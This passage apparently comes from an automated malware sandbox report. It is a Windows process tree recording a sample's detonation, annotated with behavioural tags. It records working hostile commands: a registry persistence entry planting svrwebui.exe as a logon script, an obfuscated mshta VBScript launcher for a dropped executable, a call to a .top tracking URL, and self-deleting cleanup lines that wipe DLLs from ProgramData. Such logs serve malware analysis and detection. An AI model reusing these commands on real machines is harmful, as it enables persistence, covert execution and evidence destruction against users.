                                                                                                                                                      "cmd.exe" /c reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "%ProgramData%\regid.1993-06.com.microsoft\svrwebui.exe" /f
                                                                                                                                                      4⤵
                                                                                                                                                        PID:8244
                                                                                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                          5⤵
                                                                                                                                                            PID:6708
                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                            reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe" /f
                                                                                                                                                            5⤵
                                                                                                                                                              PID:8808
                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                            "cmd.exe" /c start http://trecker33442aq.top/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=74449^&param=721
                                                                                                                                                            4⤵
                                                                                                                                                              PID:7228
                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\is-MBJLT.tmp\{app}\vdi_compiler.exe
                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\is-MBJLT.tmp\{app}\vdi_compiler"
                                                                                                                                                              4⤵
                                                                                                                                                                PID:8040
                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                  "C:\Windows\system32\cmd.exe" /c ping localhost -n 4 && del "C:\Users\Admin\AppData\Local\Temp\is-MBJLT.tmp\{app}\vdi_compiler.exe"
                                                                                                                                                                  5⤵
                                                                                                                                                                    PID:9420
                                                                                                                                                                    • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                      ping localhost -n 4
                                                                                                                                                                      6⤵
                                                                                                                                                                      • Runs ping.exe
                                                                                                                                                                      PID:2352
                                                                                                                                                                • C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe
                                                                                                                                                                  "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe"
                                                                                                                                                                  4⤵
                                                                                                                                                                    PID:5648
                                                                                                                                                            • C:\Windows\system32\rundll32.exe
                                                                                                                                                              rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                              1⤵
                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                              PID:6104
                                                                                                                                                              • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                2⤵
                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                • Modifies registry class
                                                                                                                                                                PID:4620
                                                                                                                                                              • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                "C:\Windows\System32\mshta.exe" VbScRiPt: CLoSe ( crEAteOBJeCt ( "wscrIPt.SHelL" ). RUN( "C:\Windows\system32\cmd.exe /c cOPY /y ""C:\Users\Admin\Documents\J9uLJmEhF1QUr7bKxSooMD_y.exe"" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF """" == """" for %A In (""C:\Users\Admin\Documents\J9uLJmEhF1QUr7bKxSooMD_y.exe"" ) do taskkill -f -iM ""%~NxA"" " ,0 , TRUE) )
                                                                                                                                                                2⤵
                                                                                                                                                                  PID:6996
                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                    "C:\Windows\system32\cmd.exe" /c cOPY /y "C:\Users\Admin\Documents\J9uLJmEhF1QUr7bKxSooMD_y.exe" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF "" == "" for %A In ("C:\Users\Admin\Documents\J9uLJmEhF1QUr7bKxSooMD_y.exe" ) do taskkill -f -iM "%~NxA"
                                                                                                                                                                    3⤵
                                                                                                                                                                      PID:6820
                                                                                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                        taskkill -f -iM "J9uLJmEhF1QUr7bKxSooMD_y.exe"
                                                                                                                                                                        4⤵
                                                                                                                                                                        • Kills process with taskkill
                                                                                                                                                                        PID:3640
                                                                                                                                                                • C:\Windows\system32\rundll32.exe
                                                                                                                                                                  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                  1⤵
                                                                                                                                                                  • Process spawned unexpected child process
                                                                                                                                                                  PID:6848
                                                                                                                                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                    rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                    2⤵
                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                    PID:5940
                                                                                                                                                                • C:\Windows\system32\msiexec.exe
                                                                                                                                                                  C:\Windows\system32\msiexec.exe /V
                                                                                                                                                                  1⤵
                                                                                                                                                                  • Enumerates connected drives
                                                                                                                                                                  • Drops file in Windows directory
                                                                                                                                                                  PID:7544
                                                                                                                                                                  • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                    C:\Windows\syswow64\MsiExec.exe -Embedding 351428FDCECB81F0F7D547853DB07DDF C
                                                                                                                                                                    2⤵
                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                    PID:8520
                                                                                                                                                                  • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                    C:\Windows\syswow64\MsiExec.exe -Embedding F38D1B5257479AD4402ABF28948B0E46
                                                                                                                                                                    2⤵
                                                                                                                                                                    • Blocklisted process makes network request
                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                    PID:9048
                                                                                                                                                                  • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                    C:\Windows\syswow64\MsiExec.exe -Embedding 35433C51F29897BE932806D1175C7F57 C
                                                                                                                                                                    2⤵
                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                    PID:4536
                                                                                                                                                                  • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                    C:\Windows\syswow64\MsiExec.exe -Embedding C72BF14F6A461050A120DEC6E65DB3BF C
                                                                                                                                                                    2⤵
                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                    PID:7052
                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe
                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe"
                                                                                                                                                                    2⤵
                                                                                                                                                                    • Adds Run key to start application
                                                                                                                                                                    PID:4236
                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe
                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe" -silent=1 -CID=717 -SID=717 -submn=default
                                                                                                                                                                      3⤵
                                                                                                                                                                      • Adds Run key to start application
                                                                                                                                                                      PID:9292
                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" "--anbfs"
                                                                                                                                                                        4⤵
                                                                                                                                                                        • Checks computer location settings
                                                                                                                                                                        • Suspicious use of SendNotifyMessage
                                                                                                                                                                        PID:9864
                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                          C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Cleaner\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" --annotation=plat=Win64 --annotation=prod=Cleaner --annotation=ver=0.0.13 --initial-client-data=0x208,0x20c,0x210,0x1e4,0x214,0x7ff82ccbdec0,0x7ff82ccbded0,0x7ff82ccbdee0
                                                                                                                                                                          5⤵
                                                                                                                                                                            PID:10052
                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                              C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Cleaner\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Cleaner --annotation=ver=0.0.13 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff7ca269e70,0x7ff7ca269e80,0x7ff7ca269e90
                                                                                                                                                                              6⤵
                                                                                                                                                                                PID:9392
                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1636,2344158465146258247,17356752181566215641,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9864_901909287" --mojo-platform-channel-handle=1704 /prefetch:8
                                                                                                                                                                              5⤵
                                                                                                                                                                                PID:7264
                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=gpu-process --field-trial-handle=1636,2344158465146258247,17356752181566215641,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9864_901909287" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1652 /prefetch:2
                                                                                                                                                                                5⤵
                                                                                                                                                                                  PID:9736
                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1636,2344158465146258247,17356752181566215641,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9864_901909287" --mojo-platform-channel-handle=2104 /prefetch:8
                                                                                                                                                                                  5⤵
                                                                                                                                                                                    PID:2268
                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Cleaner\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1636,2344158465146258247,17356752181566215641,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9864_901909287" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2480 /prefetch:1
                                                                                                                                                                                    5⤵
                                                                                                                                                                                    • Checks computer location settings
                                                                                                                                                                                    PID:10192
                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Cleaner\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1636,2344158465146258247,17356752181566215641,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9864_901909287" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --mojo-platform-channel-handle=2576 /prefetch:1
                                                                                                                                                                                    5⤵
                                                                                                                                                                                    • Checks computer location settings
                                                                                                                                                                                    PID:4724
                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=gpu-process --field-trial-handle=1636,2344158465146258247,17356752181566215641,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9864_901909287" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3288 /prefetch:2
                                                                                                                                                                                    5⤵
                                                                                                                                                                                      PID:7752
                                                                                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                  "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -NoLogo -ExecutionPolicy AllSigned -Command "C:\Users\Admin\AppData\Local\Temp\AI_99DC.ps1 -paths 'C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\file_deleter.ps1','C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe','C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites' -retry_count 10"
                                                                                                                                                                                  3⤵
                                                                                                                                                                                  • Blocklisted process makes network request
                                                                                                                                                                                  PID:6772
                                                                                                                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                    4⤵
                                                                                                                                                                                      PID:9420
                                                                                                                                                                              • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                1⤵
                                                                                                                                                                                • Process spawned unexpected child process
                                                                                                                                                                                PID:7984
                                                                                                                                                                                • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                  2⤵
                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                  PID:7148
                                                                                                                                                                              • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                c:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall
                                                                                                                                                                                1⤵
                                                                                                                                                                                • Drops file in Windows directory
                                                                                                                                                                                • Checks SCSI registry key(s)
                                                                                                                                                                                PID:7936
                                                                                                                                                                                • C:\Windows\system32\DrvInst.exe
                                                                                                                                                                                  DrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{34df224c-46d1-2e40-8ad5-8f41575c0644}\oemvista.inf" "9" "4d14a44ff" "0000000000000174" "WinSta0\Default" "0000000000000170" "208" "c:\program files (x86)\maskvpn\driver\win764"
                                                                                                                                                                                  2⤵
                                                                                                                                                                                  • Drops file in System32 directory
                                                                                                                                                                                  • Drops file in Windows directory
                                                                                                                                                                                  • Checks SCSI registry key(s)
                                                                                                                                                                                  • Modifies data under HKEY_USERS
                                                                                                                                                                                  PID:2152
                                                                                                                                                                                • C:\Windows\system32\DrvInst.exe
                                                                                                                                                                                  DrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000174"
                                                                                                                                                                                  2⤵
                                                                                                                                                                                    PID:4304
                                                                                                                                                                                • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                  c:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc
                                                                                                                                                                                  1⤵
                                                                                                                                                                                    PID:6784
                                                                                                                                                                                  • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                    c:\windows\system32\svchost.exe -k netsvcs -s DsmSvc
                                                                                                                                                                                    1⤵
                                                                                                                                                                                    • Checks SCSI registry key(s)
                                                                                                                                                                                    PID:7184
                                                                                                                                                                                  • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                                                                                                                                    "C:\Program Files (x86)\MaskVPN\mask_svc.exe"
                                                                                                                                                                                    1⤵
                                                                                                                                                                                    • Drops file in Drivers directory
                                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                                    • Drops file in System32 directory
                                                                                                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                    • Drops file in Windows directory
                                                                                                                                                                                    • Checks SCSI registry key(s)
                                                                                                                                                                                    • Modifies data under HKEY_USERS
                                                                                                                                                                                    PID:4304
                                                                                                                                                                                    • C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exe
                                                                                                                                                                                      MaskVPNUpdate.exe /silent
                                                                                                                                                                                      2⤵
                                                                                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                      PID:4308
                                                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                    1⤵
                                                                                                                                                                                    • Drops file in Windows directory
                                                                                                                                                                                    • Modifies Internet Explorer settings
                                                                                                                                                                                    • Modifies registry class
                                                                                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                    PID:7988
                                                                                                                                                                                  • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                    C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                    1⤵
                                                                                                                                                                                    • Modifies Internet Explorer settings
                                                                                                                                                                                    PID:5124
                                                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                    1⤵
                                                                                                                                                                                    • Modifies registry class
                                                                                                                                                                                    • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                    PID:8816
                                                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                    1⤵
                                                                                                                                                                                    • Modifies Internet Explorer settings
                                                                                                                                                                                    • Modifies registry class
                                                                                                                                                                                    PID:8780
                                                                                                                                                                                  • C:\Windows\system32\backgroundTaskHost.exe
                                                                                                                                                                                    "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:CortanaUI.AppXy7vb4pc2dr3kc93kfc509b1d0arkfb2x.mca
                                                                                                                                                                                    1⤵
                                                                                                                                                                                      PID:7228
                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\8B3B.exe
                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\8B3B.exe
                                                                                                                                                                                      1⤵
                                                                                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                      PID:7924
                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\8E78.exe
                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\8E78.exe
                                                                                                                                                                                      1⤵
                                                                                                                                                                                        PID:6772
                                                                                                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                        1⤵
                                                                                                                                                                                        • Modifies registry class
                                                                                                                                                                                        PID:8964
                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\9A60.exe
                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\9A60.exe
                                                                                                                                                                                        1⤵
                                                                                                                                                                                        • Checks BIOS information in registry
                                                                                                                                                                                        • Checks whether UAC is enabled
                                                                                                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                        PID:4312
                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\B125.exe
                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\B125.exe
                                                                                                                                                                                        1⤵
                                                                                                                                                                                        • Checks BIOS information in registry
                                                                                                                                                                                        • Checks whether UAC is enabled
                                                                                                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                        PID:9456
                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\B387.exe
                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\B387.exe
                                                                                                                                                                                        1⤵
                                                                                                                                                                                          PID:9504
                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /c taskkill /im B387.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\B387.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                                                            2⤵
                                                                                                                                                                                              PID:9588
                                                                                                                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                taskkill /im B387.exe /f
                                                                                                                                                                                                3⤵
                                                                                                                                                                                                • Kills process with taskkill
                                                                                                                                                                                                PID:9840
                                                                                                                                                                                              • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                timeout /t 6
                                                                                                                                                                                                3⤵
                                                                                                                                                                                                • Delays execution with timeout.exe
                                                                                                                                                                                                PID:10072
                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\B6B5.exe
                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\B6B5.exe
                                                                                                                                                                                            1⤵
                                                                                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                                                                                            PID:9528
                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\B6B5.exe
                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\B6B5.exe"
                                                                                                                                                                                              2⤵
                                                                                                                                                                                              • Checks processor information in registry
                                                                                                                                                                                              PID:9808
                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /c taskkill /im B6B5.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\B6B5.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                                                                3⤵
                                                                                                                                                                                                  PID:7832
                                                                                                                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                    taskkill /im B6B5.exe /f
                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                    • Kills process with taskkill
                                                                                                                                                                                                    PID:9064
                                                                                                                                                                                                  • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                    timeout /t 6
                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                    • Delays execution with timeout.exe
                                                                                                                                                                                                    PID:320
                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\BBC7.exe
                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\BBC7.exe
                                                                                                                                                                                              1⤵
                                                                                                                                                                                              • Checks processor information in registry
                                                                                                                                                                                              PID:9680
                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /c taskkill /im BBC7.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\BBC7.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                                                                2⤵
                                                                                                                                                                                                • Blocklisted process makes network request
                                                                                                                                                                                                PID:9832
                                                                                                                                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                  taskkill /im BBC7.exe /f
                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                  • Kills process with taskkill
                                                                                                                                                                                                  PID:5996
                                                                                                                                                                                                • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                  timeout /t 6
                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                  • Delays execution with timeout.exe
                                                                                                                                                                                                  PID:6980
                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\C964.exe
                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\C964.exe
                                                                                                                                                                                              1⤵
                                                                                                                                                                                                PID:9788
                                                                                                                                                                                              • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                1⤵
                                                                                                                                                                                                  PID:9832
                                                                                                                                                                                                • C:\Windows\explorer.exe
                                                                                                                                                                                                  C:\Windows\explorer.exe
                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                    PID:9888
                                                                                                                                                                                                  • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                    C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                      PID:9980
                                                                                                                                                                                                    • C:\Windows\explorer.exe
                                                                                                                                                                                                      C:\Windows\explorer.exe
                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                      • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                      PID:10040
                                                                                                                                                                                                    • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                      C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                        PID:10108
                                                                                                                                                                                                      • C:\Windows\explorer.exe
                                                                                                                                                                                                        C:\Windows\explorer.exe
                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                        • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                        PID:10220
                                                                                                                                                                                                      • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                        C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                          PID:9312
                                                                                                                                                                                                        • C:\Windows\explorer.exe
                                                                                                                                                                                                          C:\Windows\explorer.exe
                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                          • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                          PID:6476
                                                                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                          • Modifies registry class
                                                                                                                                                                                                          PID:7504
                                                                                                                                                                                                        • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                          C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                            PID:8444
                                                                                                                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                            • Modifies registry class
                                                                                                                                                                                                            PID:9868
                                                                                                                                                                                                          • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                            c:\windows\system32\svchost.exe -k netsvcs -s seclogon
                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                            • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                                                                                                            PID:316
                                                                                                                                                                                                          • C:\Windows\system32\DllHost.exe
